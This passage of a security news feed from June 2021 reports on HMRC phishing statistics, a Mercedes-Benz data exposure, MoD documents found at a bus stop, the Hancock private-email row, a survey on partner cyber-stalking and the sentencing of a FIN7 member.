Email was the most commonly used vector to launch suspected HMRC-branded phishing attacks in this period, according to the figures. These rose by 109% compared to the previous year, from 301,170 to 630,193. Sharp rises were also observed concerning suspected phone call scams (up 66%) and SMS scams (up 52%) over this period.

Additionally, reports for scams impersonating the Driver and Vehicle Licensing Agency (DVLA), which HMRC receives reports for, increased by a colossal 661%, from just 5,549 cases in 2019-20 to 42,233 in 2020-21.

Tim Sadler, CEO of Tessian, pointed out that “Impersonating an authoritative organization like HMRC is a tried and tested way for cybercriminals to create a sense of urgency and fear, in order to manipulate people into sharing financial information or credentials via phishing or smishing scams. And they’ve upped the ante, particularly over the past 12 months, in the hope that by sending more emails, more people might fall for their schemes.

“Sadly, spotting the scams isn’t always easy, and hackers are making them even harder to detect. The general rule is to never click on links in unexpected texts or emails, even if you feel under pressure. Remember, you can always verify the request is real by calling the company directly or checking your online account.”

The new figures chime with official data released in November 2020, which showed that HMRC detected a 73% rise in email phishing attacks in the first six months following the start of the COVID-19 pandemic.

Mercedes Benz Data Leak Includes Card and Social Security Details

Info Security - Mon, 06/28/2021 - 09:53

Mercedes Benz has released details of a data breach affecting customers and prospective buyers in the US.

The luxury carmaker said a vendor had informed the company on June 11 that the information was “inadvertently made accessible on a cloud storage platform.” It appears that a third-party security researcher first raised the alarm.

Although the initial investigation was set to discover whether 1.6 million unique records had been exposed, subsequent findings indicated far fewer customers and interested buyers were affected.

“The vendor reports that the personal information for these individuals (less than 1,000) is comprised mainly of self-reported credit scores as well as a very small number of driver’s license numbers, social security numbers, credit card information and dates of birth,” the statement noted.

“To view the information, one would need knowledge of special software programs and tools — an internet search would not return any information contained in these files.”

These individuals entered the information in question on dealer and Mercedes-Benz websites between January 1, 2014, and June 19, 2017.

Mercedes Benz USA confirmed that none of its systems were compromised in the incident and said the issue had been mitigated by the security vendor and cannot recur.

Although it’s unlikely that threat actors managed to locate and access the information, it’s unclear how long it had been exposed.

Mercedes-Benz USA has begun notifying those affected and said that anyone who had credit card information, driver’s license or social security numbers exposed will be offered a free 24-month subscription to a credit monitoring service.

Tom Garrubba, CISO at risk management firm Shared Assessments, welcomed the carmaker’s prompt action.

“With all the cyber-incidents that have been reported recently, it is refreshing to see the swift action taken by Mercedes Benz USA in addressing the incident with their cloud service provider and ultimately, with their customers," he added.

“The reported breach of 1000 existing and prospective customers via their cloud storage vendor’s platform should raise awareness of the importance of proper due diligence and understanding as to how your cloud service providers are protecting your data.”

Sensitive Defense Documents Found at Bus Stop

Info Security - Mon, 06/28/2021 - 09:22

Classified Ministry of Defence (MoD) documents have reportedly been discovered at a bus stop in southern England, raising concerns over national security.

Nearly 50 pages were found by a member of the public behind the bus stop in Kent last Tuesday and shown to the BBC.

They are said to contain printed emails and PowerPoint presentations from a senior official at the MoD.

These include information on the decision-making process that saw a Type 45 destroyer, HMS Defender, sail in a controversial “freedom of navigation” maneuver close to Russian-annexed Crimea last week.

Other documents in the trawl reportedly included discussions of arms exports campaigns, briefing notes on President Biden’s first few months in office, and the role of British special forces in Afghanistan once the US pulls out.

Most of the documents are said to have been marked “official sensitive,” which is a fairly low classification level. However, the Afghanistan document, intended for defense secretary Ben Wallace, was labeled “Secret UK Eyes Only” — indicating a high level of sensitivity.

Apricorn’s EMEA managing director, Jon Fielding, said the incident was “disturbing” given the efforts underway in many organizations to secure sensitive documents digitally.

“We don’t know how the documents came to be there, but this should serve as another wake-up call for the government to take the need to secure sensitive data more seriously,” he argued.

“The public and private sector are adapting to a new way of working that requires data to be transferred between the office and other, less secure environments. This can only be achieved safely by digitizing documents, which brings indisputable benefits when it comes to data encryption, transfer, storage, online/offline back-ups, and management.”

Concerns are increasingly being raised about levels of cyber-risk at the MoD.

There was a reported 18% rise in data loss incidents at the ministry from 2019-20, several of which had to be reported to the Information Commissioner’s Office (ICO).

In March this year, a separate report, based on Freedom of Information (FOI) data, claimed security incidents at contractors had doubled over the previous 12 months.

The MoD is currently carrying out an investigation into the latest document data leak.

Former Health Secretary Faces Probe Over Use of Personal Emails

Info Security - Mon, 06/28/2021 - 08:43

Former health secretary Matt Hancock is facing further pressure this week after Labour called for an investigation into his alleged use of personal email to conduct official government business.

Hancock was forced to resign after CCTV footage leaked last week showed the married Tory MP in a romantic embrace with an advisor in his Whitehall office, breaking social distancing guidelines.

Labour deputy leader, Angela Rayner, has now called on the cabinet secretary to launch an inquiry into whether private emails were used to discuss the awarding of government contracts during the pandemic.

“We need to know how much government business is being conducted in secret by ministers using private email accounts to avoid scrutiny, hide information from the public inquiry into COVID and do dodgy deals for government contracts with their mates,” she tweeted today.

There have previously been accusations of cronyism in the government’s awarding of large contracts for personal protective equipment (PPE) and other COVID-related items.

Last year, the Guardian revealed that a former publican whose pub was located close to Hancock’s constituency home in Suffolk won a £50 million contract for test-and-trace supplies despite running a company that had no experience producing such equipment.

The two are said to have communicated over WhatsApp and email, although it’s unclear if Hancock’s personal email was used on this occasion.

According to Cabinet Office guidelines, a copy of any personal email used for government business should be sent to the minister’s departmental email address.

Security experts have warned that Hancock's alleged favoring of private email communications may have exposed the government to cyber-risk.

“Personal accounts are less secured and are not monitored by the government’s cybersecurity team. They are also cracked more easily than the encrypted accounts issued to ministers,” argued Mark Rodbert, Founder and CEO of cybersecurity firm IDAX Software.

“If a cyber-criminal can access a personal email, which is easier than you may think if the password is a combination of English words, they can control the email account.”

Jolyon Maugham, a lawyer who has litigated against the government over the unfair awarding of contracts during the pandemic, said it is not technically illegal for ministers to use personal emails.

However, he added: “It’s a bit like walking into a bank on a hot summer’s day wearing a balaclava, it’s not wrong in itself, but it is a strong sign that you are up to no good.”

Maugham claimed on Friday he has evidence, now with the Serious Fraud Office, of government corruption in the awarding of COVID-related contracts.

Young Americans Twice as Likely to Cyber-stalk

Info Security - Fri, 06/25/2021 - 17:57

In the United States, young adults are more than twice as likely as older Americans to cyber-stalk their current or former romantic partners.

New research by NortonLifeLock found three in five Gen Z and Millennial American adults who have been in a romantic relationship (60% of those ages 18 to 39) have digitally checked up on an ex or current squeeze without their knowledge or consent. 

The same admission was made by just a quarter (24%) of Americans aged 40 years old or older. 

Survey responses about cyber-stalking and online habits were gathered from more than 10,000 adults 18+ across 10 countries, including 1,000 adults in the United States, as part of the "2021 Norton Cyber Safety Insights Report: Special Release – Online Creeping" report.

Nearly half of Americans aged 19 to 39 who are in a relationship said they wouldn't be surprised to find their partner was spying on them via an app. Two in five (42%) said they believe their significant other is at least somewhat likely to download creepware or stalkerware onto their device(s) to monitor activity such as text messages, phone calls, direct messages, emails, and photos. 

This figure is three times higher than the percentage of Americans aged 40 or older (14%) who gave the same response.

While more than one-third of Americans ages 18 to 39 said they considered it harmless to stalk a current or former partner online (35%), just 11% of Americans who are 40 or older agreed. 

Worryingly, 14% of Americans between the ages of 18 and 39 who have been in a romantic relationship admitted using an app to secretly monitor their partner’s device activity.

Men were found to be three times more likely than women to use an invasive app to spy on their partner.

The findings were published on June 24 as a special addendum to the 2021 Norton Cyber Safety Insights Report (NCSIR).

"Between September 2020 and May 2021, our research team found a 63% uptick in the number of devices infected with stalkerware, amounting to more than 250,000 compromised devices per month,” remarked Kevin Roundy, technical director and stalkerware specialist with Norton Labs, NortonLifeLock’s research division. 

“It’s alarming to think about this increase within the context of our study." 

FIN7 Pen Tester to Serve Seven Years

Info Security - Fri, 06/25/2021 - 17:30

A high-level member of the notorious organized cybercrime group FIN7 is to spend the next seven years in an American prison.

Hacker Andrii Kolpakov was an active member of FIN7 from at least April 2016 until his arrest in Lepe, Spain, on June 28, 2018. 

The 33-year-old Ukrainian national, who was referred to within the hacking group as a pen tester, pleaded guilty in June 2020 to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking.

The dozens of members of FIN7 (also referred to as Carbanak Group and the Navigator Group, among other names) stole more than a billion dollars from hundreds of companies in the United States.  

Since at least 2015, the group used malware to hack into thousands of computer systems and exfiltrate millions of customer credit and debit card numbers. The stolen credentials were then either used by FIN7 or sold on to other cyber-criminals for profit. 

The group successfully breached the computer networks of businesses in all 50 states and the District of Columbia, stealing more than 20 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations.

Most of the companies targeted by FIN7 in the United States were in the restaurant, gambling and hospitality industries. Among the group's many victims were Chipotle Mexican Grill, Chili’s, Arby’s, Red Robin and Jason’s Deli. 

FIN7 also attacked companies in Australia, France and the United Kingdom. 

Explaining how the group's nefarious scheme operated, the Department of Justice stated: "FIN7 carefully crafted email messages that would appear legitimate to a business’s employees and accompanied emails with telephone calls intended to further legitimize the emails. 

"Once an attached file was opened and activated, FIN7 would use an adapted version of the Carbanak malware, in addition to an arsenal of other tools, to access and steal payment card data for the business’s customers."

Kolpakov was extradited from Spain to the United States on June 1, 2019. On Thursday, he was sentenced to seven years in prison and ordered to pay restitution of $2.5m. 